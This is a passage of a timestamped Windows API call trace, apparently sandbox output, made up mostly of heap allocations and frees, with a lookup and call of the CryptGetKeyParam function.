HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.157] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.157] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4f8 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.158] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5a8 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f9748, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.162] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.162] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.164] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a9a10 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.164] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.164] HeapFree (in: hHeap=0x650000, 